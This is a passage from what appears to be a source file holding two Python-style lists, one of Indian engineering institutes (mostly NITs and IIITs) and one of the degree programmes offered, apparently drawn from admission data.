'National Institute of Technology, Jamshedpur' ,
'National Institute of Technology Durgapur' ,
'Indian Institute of Information Technology(IIIT),Vadodara, Gujrat' ,
'Dr. B R Ambedkar National Institute of Technology,Jalandhar' ,
'Indian Institute of Information Technology (IIIT)Nagpur' ,
'National Institute of Technology Arunachal Pradesh' ,
'National Institute of Technology Hamirpur' ,
'Indian Institute of Information Technology, Design &Manufacturing, Kancheepuram' ,
'National Institute of Technology, Rourkela' ,
'National Institute of Technology Meghalaya' ,
'National Institute of Technology Hamirpur' ,
'National Institute of Technology, Rourkela' ,
'National Institute of Technology Sikkim' ,
'Indian Institute of Information Technology Guwahati' ,
'Indian Institute of Information Technology (IIIT)Kota,Rajasthan' ,
'National Institute of Technology Goa' ,
'National Institute of Technology, Rourkela' ,
'National Institute of Technology Raipur' ,
'National Institute of Technology Nagaland' ,
'Indian Institute of Information Technology Design &Manufacturing Kurnool, Andhra Pradesh' ,
'National Institute of Technology, Kurukshetra' ,
'Dr. B R Ambedkar National Institute of Technology,Jalandhar' ,
'National Institute of Technology Puducherry' ,
'Indian Institute of Information Technology (IIIT)Ranchi' ,
'National Institute of Technology Meghalaya' ,
'Indian Institute of Information Technology Bhopal' ,
'Indian Institute of Information Technology(IIIT)Kottayam' ,
'Indian Institute of Information Technology, Design & Manufacturing, Kancheepuram' ,
'National Institute of Technology, Rourkela' ,
'Visvesvaraya National Institute of Technology,Nagpur' ,
'National Institute of Technology, Mizoram' ,
'National Institute of Technology Calicut' ,
'Indian Institute of Information Technology(IIIT) Una,Himachal Pradesh' ,
'National Institute of Technology Raipur' ,
'National Institute of Technology, Rourkela' ,
'Indian Institute of Information Technology(IIIT)Dharwad' ,
'National Institute of Technology Calicut' ,
'National Institute of Technology Patna' ,
'Indian Institute of Information Technology Surat' ,
'National Institute of Technology, Srinagar' ,
'National Institute of Technology, Silchar' ,
'Pt. Dwarka Prasad Mishra Indian Institute ofInformation Technology, Design & Manufacture Jabalpur' ,
'Indian Institute of Information Technology(IIIT)Kalyani, West Bengal' ,
'National Institute of Technology, Uttarakhand' ,
'Central University of Rajasthan, Rajasthan' ,
'International Institute of Information Technology,Bhubaneswar' ,
'Punjab Engineering College, Chandigarh' ,
'Visvesvaraya National Institute of Technology,Nagpur' ,
'Malaviya National Institute of Technology Jaipur' ,
'National Institute of Technology Arunachal Pradesh' ,
'Indian Institute of Information Technology Bhopal' ,
'Sardar Vallabhbhai National Institute of Technology,Surat' ,
'Indian Institute of Information Technology (IIIT)Nagpur' ,
'National Institute of Technology, Andhra Pradesh' ,
'Birla Institute of Technology, Mesra, Ranchi' ,
'Pondicherry Engineering College, Puducherry' ,
'National Institute of Technology, Rourkela' ,
'National Institute of Technology, Manipur' ,
'National Institute of Technology Sikkim' ,
'Indian Institute of Engineering Science andTechnology, Shibpur' ,
'Birla Institute of Technology, Mesra, Ranchi' ,
'Indian Institute of Information Technology Design &Manufacturing Kurnool, Andhra Pradesh' ,
'Maulana Azad National Institute of TechnologyBhopal' ,
'National Institute of Technology, Manipur' ,
'National Institute of Technology, Rourkela' ,
'National Institute of Technology, Jamshedpur' ,
'National Institute of Technology Hamirpur' ,
'National Institute of Technology Agartala' ,
'National Institute of Technology, Andhra Pradesh' ,
'Institute of Infrastructure, Technology, Research andManagement-Ahmedabad' ,
'National Institute of Technology Sikkim' ,
'J.K. Institute of Applied Physics & Technology,Department of Electronics & Communication, University of Allahabad- Allahabad' ,
'Sardar Vallabhbhai National Institute of Technology,Surat' ,
'Indian Institute of Information Technology(IIIT)Dharwad' ,
'Indian Institute of Information Technology, Agartala' ,
'National Institute of Technology, Rourkela' ,
'Motilal Nehru National Institute of TechnologyAllahabad' ,
'National Institute of Technology, Jamshedpur' ,
'Indian Institute of Information Technology (IIIT)Ranchi' ,
'National Institute of Technology Agartala' ,
'International Institute of Information Technology,Bhubaneswar' ,
'Indian Institute of Information Technology Bhagalpur' ,
'Indian Institute of Information Technology(IIIT) Una,Himachal Pradesh' ,
'National Institute of Technology Durgapur' ,
'National Institute of Technology Agartala' ,
'National Institute of Technology Arunachal Pradesh' ,
'National Institute of Technology, Rourkela' ,
'Punjab Engineering College, Chandigarh' ,
'National Institute of Technology Agartala' ,
'National Institute of Technology Nagaland' ,
'Indian Institute of Information Technology Manipur' ,
'National Institute of Technology, Srinagar' ,
'National Institute of Technology Meghalaya' ,
'Indian Institute of Information Technology, Design &Manufacturing, Kancheepuram' ,
'Institute of Infrastructure, Technology, Research andManagement-Ahmedabad' ,
'Indian Institute of Information Technology, Design &Manufacturing, Kancheepuram' ,
'National Institute of Technology, Srinagar' ,
'National Institute of Technology, Mizoram' ,
'Indian Institute of Engineering Science andTechnology, Shibpur' ,
'Dr. B R Ambedkar National Institute of Technology,Jalandhar' ,
'National Institute of Technology Raipur' ,
'National Institute of Technology Patna' ,
'Central University of Rajasthan, Rajasthan' ,
'National Institute of Technology Sikkim' ,
'Indian Institute of Engineering Science andTechnology, Shibpur' ,
'Indian Institute of Information Technology Bhagalpur' ,
'Dr. B R Ambedkar National Institute of Technology,Jalandhar' ,
'National Institute of Technology, Mizoram' ,
'National Institute of Technology, Manipur' ,
'Indian Institute of Information Technology Design &Manufacturing Kurnool, Andhra Pradesh' ,
'National Institute of Technology Agartala' ,
'National Institute of Technology Arunachal Pradesh' ,
'National Institute of Technology, Andhra Pradesh' ,
'National Institute of Technology Patna' ,
'J.K. Institute of Applied Physics & Technology,Department of Electronics & Communication, University of Allahabad- Allahabad' ,
'National Institute of Technology Raipur' ,
'Indian Institute of Information Technology, Design &Manufacturing, Kancheepuram' ,
'Assam University, Silchar' ,
'National Institute of Technology Durgapur' ,
'Sant Longowal Institute of Engineering andTechnology' ,
'National Institute of Technology Nagaland' ,
'National Institute of Technology Nagaland' ,
'Pondicherry Engineering College, Puducherry' ,
'Birla Institute of Technology, Mesra, Ranchi' ,
'National Institute of Technology, Andhra Pradesh' ,
'Indian Institute of Information Technology Manipur' ,
'Institute of Infrastructure, Technology, Research andManagement-Ahmedabad' ,
'National Institute of Technology Raipur' ,
'Dr. B R Ambedkar National Institute of Technology,Jalandhar' ,
'Indian Institute of Information Technology Bhagalpur' ,
'Birla Institute of Technology, Mesra, Ranchi' ,
'National Institute of Technology, Mizoram' ,
'National Institute of Electronics and Information Technology,Aurangabad (Maharashtra)' ,
'National Institute of Technology Nagaland' ,
'National Institute of Technology Durgapur' ,
'National Institute of Technology, Srinagar' ,
'National Institute of Technology Durgapur' ,
'National Institute of Technology, Srinagar' ,
'Punjab Engineering College, Chandigarh' ,
'National Institute of Technology Agartala' ,
'Sardar Vallabhbhai National Institute of Technology,Surat' ,
'Institute of Technology, Guru GhasidasVishwavidyalaya (A Central University), Bilaspur, (C.G.)' ,
'Birla Institute of Technology, Mesra, Ranchi' ,
'Pondicherry Engineering College, Puducherry' ,
'National Institute of Technology Agartala' ,
'Sant Longowal Institute of Engineering andTechnology' ,
'National Institute of Technology, Rourkela' ,
'School of Engineering, Tezpur University, Napaam,Tezpur' ,
'National Institute of Technology Patna' ,
'Gurukula Kangri Vishwavidyalaya, Haridwar' ,
'National Institute of Technology Raipur' ,
'Central institute of Technology Kokrajar, Assam' ,
'National Institute of Technology, Srinagar' ,
'HNB Garhwal University Srinagar (Garhwal)' ,
'Assam University, Silchar' ,
'Central institute of Technology Kokrajar, Assam' ,
'National Institute of Technology Agartala' ,
'Sant Longowal Institute of Engineering andTechnology' ,
'Pondicherry Engineering College, Puducherry' ,
'Shri Mata Vaishno Devi University, Katra, Jammu &Kashmir' ,
'HNB Garhwal University Srinagar (Garhwal)' ,
'Mizoram University, Aizawl' ,
'Institute of Technology, Guru GhasidasVishwavidyalaya (A Central University), Bilaspur, (C.G.)' ,
'Mizoram University, Aizawl' ,
'Institute of Technology, Guru GhasidasVishwavidyalaya (A Central University), Bilaspur, (C.G.)' ,
'School of Engineering, Tezpur University, Napaam,Tezpur' ,
'Ghani Khan Choudhary Institute of Engineering andTechnology, Malda, West Bengal' ,
'HNB Garhwal University Srinagar (Garhwal)' ,
'Central institute of Technology Kokrajar, Assam' ,
'HNB Garhwal University Srinagar (Garhwal)' ,
'School of Engineering, Tezpur University, Napaam,Tezpur' ,
'Central institute of Technology Kokrajar, Assam' ,
'Ghani Khan Choudhary Institute of Engineering andTechnology, Malda, West Bengal' ,
'School of Engineering, Tezpur University, Napaam,Tezpur' ,
'Gurukula Kangri Vishwavidyalaya, Haridwar' ,
'National Institute of Foundry & Forge Technology,Hatia, Ranchi' ,
'Mizoram University, Aizawl' ,
'Sant Longowal Institute of Engineering andTechnology' ,
'Mizoram University, Aizawl' ,
'Institute of Technology, Guru GhasidasVishwavidyalaya (A Central University), Bilaspur, (C.G.)' ,
'Gurukula Kangri Vishwavidyalaya, Haridwar' ,
'School of Engineering, Tezpur University, Napaam,Tezpur' ,
'Sant Longowal Institute of Engineering andTechnology' ,
'Shri Mata Vaishno Devi University, Katra, Jammu &Kashmir' ,
'Institute of Technology, Guru GhasidasVishwavidyalaya (A Central University), Bilaspur, (C.G.)' ,
'Institute of Technology, Guru GhasidasVishwavidyalaya (A Central University), Bilaspur, (C.G.)' ,
'HNB Garhwal University Srinagar (Garhwal)' ,
'Gurukula Kangri Vishwavidyalaya, Haridwar' ,
'Shri Mata Vaishno Devi University, Katra, Jammu &Kashmir' ,
'Sant Longowal Institute of Engineering andTechnology' ,
'Mizoram University, Aizawl' ,
'National Institute of Foundry & Forge Technology,Hatia, Ranchi' ,
'Assam University, Silchar' ,
'Shri Mata Vaishno Devi University, Katra, Jammu &Kashmir' ,
'Shri Mata Vaishno Devi University, Katra, Jammu &Kashmir' ,
'Central institute of Technology Kokrajar, Assam' ,
'Indian Institute of Carpet Technology, Bhadohi' ,
'Institute of Technology, Guru Ghasidas Vishwavidyalaya (A Central University), Bilaspur, (C.G.)' ,
'Sant Longowal Institute of Engineering andTechnology' ,
'Ghani Khan Choudhary Institute of Engineering andTechnology, Malda, West Bengal' ,
'School of Engineering, Tezpur University, Napaam, Tezpur' ,
'National Institute of Food Technology Entrepreneurship and Management, Sonepat, Haryana' ,
]
Streams = [
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electronics and Instrumentation Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (5 Years, Bachelor and Master ofTechnology (Dual Degree))' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Instrumentation and Control Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Computer Science (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Aerospace Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science (5 Years, Integrated Master of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Integrated B. Tech.(IT) and M. Tech (IT) (5 Years, Integrated B. Tech. andM. Tech. /MBA)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Physics (5 Years, Integrated Master of Science)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Engineering Physics (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Telecommunication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Aerospace Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Production Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (5 Years, Bachelor and Master ofTechnology (Dual Degree))' ,
'Integrated B. Tech.(IT) and MBA (5 Years, Integrated B. Tech. and M. Tech./MBA)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Data Science and Artificial Intelligence (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (5 Years, Bachelor and Masterof Technology (Dual Degree))' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (5 Years, Bachelor and Master of Technology (DualDegree))' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Production and Industrial Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (5 Years, Bachelor and Master ofTechnology (Dual Degree))' ,
'Mathematics (5 Years, Integrated Master of Science)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (5 Years, Bachelor and Masterof Technology (Dual Degree))' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Mining Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Instrumentation Engineering (4 Years, Bachelor ofTechnology)' ,
'Mathematics and Computing (5 Years, Integrated Master of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Production Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Bio Technology (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'B. Tech. Electronics and Communication Engineering and M. Tech. Electronics andCommunication Engineering with specialization in VLSI Design (5 Years, Bachelor and Master of Technology (Dual Degree))' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Mining Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (5 Years, Bachelor and Master of Technology (DualDegree))' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Instrumentation and Control Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Bio Technology (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (5 Years, Bachelor and Master ofTechnology (Dual Degree))' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Industrial Design (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Engineering (4 Years, Bachelor of Technology)' ,
'Production and Industrial Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'B. Tech. Electronics and Communication Engineering and M. Tech.Electronics and Communication Engineering with specialization in Communication Systems Design (5 Years, Bachelor and Master of Technology (Dual Degree))' ,
'Mining Engineering (5 Years, Bachelor and Master of Technology (DualDegree))' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Materials Science and Engineering (4 Years, Bachelor of Technology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Chemistry (5 Years, Integrated Master of Science)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Bio Technology (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Telecommunication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Mining Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Physics (5 Years, Integrated Master of Science)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Bio Medical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering with specialization in Design andManufacturing (4 Years, Bachelor of Technology)' ,
'Materials Science and Metallurgical Engineering (4 Years, Bachelor ofTechnology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Ceramic Engineering (4 Years, Bachelor of Technology)' ,
'Production and Industrial Engineering (4 Years, Bachelor of Technology)' ,
'Materials Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Instrumentation Engineering (4 Years, Bachelor ofTechnology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Mathematics (5 Years, Integrated Master of Science)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Food Process Engineering (4 Years, Bachelor of Technology)' ,
'Bio Technology (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Engineering Physics (5 Years, Bachelor and Master of Technology (DualDegree))' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Ceramic Engineering and M.Tech Industrial Ceramic (5 Years, Bachelor andMaster of Technology (Dual Degree))' ,
'Production and Industrial Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'B. Tech. Mechanical Engineering and M. Tech. in Mechanical Engineeringwith specialization in Product Design (5 Years, Bachelor and Master of Technology (Dual Degree))' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Smart Manufacturing (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Mining Engineering (4 Years, Bachelor of Technology)' ,
'Industrial and Production Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Physics (5 Years, Integrated Master of Science)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgy and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Bio Technology (4 Years, Bachelor of Technology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering with specialization in Design and Manufacturing (4 Years,Bachelor of Technology)' ,
'Physics (5 Years, Bachelor of Science and Master of Science (Dual Degree))' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Mathematics (5 Years, Integrated Master of Science)' ,
'Electronics and Communication Engineering (4 Years, Bachelor of Technology)' ,
'Mining Engineering (4 Years, Bachelor of Technology)' ,
'B. Tech. Mechanical Engineering and M. Tech. Mechanical Engineeringwith specialization in Advanced Manufacturing (5 Years, Bachelor and Master of Technology (Dual Degree))' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Bio Technology (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Instrumentation Engineering (4 Years, Bachelor ofTechnology)' ,
'Electrical and Electronics Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Production Engineering (4 Years, Bachelor of Technology)' ,
'Bio Technology (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Bio Technology (4 Years, Bachelor of Technology)' ,
'Textile Technology (4 Years, Bachelor of Technology)' ,
'Mechatronics Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (Plastic and Polymer) (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electronics System Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Chemistry (5 Years, Integrated Master of Science)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Biotechnology (5 Years, Bachelor and Master of Technology (Dual Degree))' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Materials and Metallurgical Engineering (4 Years, Bachelor of Technology)' ,
'Production Engineering (4 Years, Bachelor of Technology)' ,
'Chemistry (5 Years, Integrated Master of Science)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Bio Technology (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Biotechnology and Biochemical Engineering (4 Years, Bachelor ofTechnology)' ,
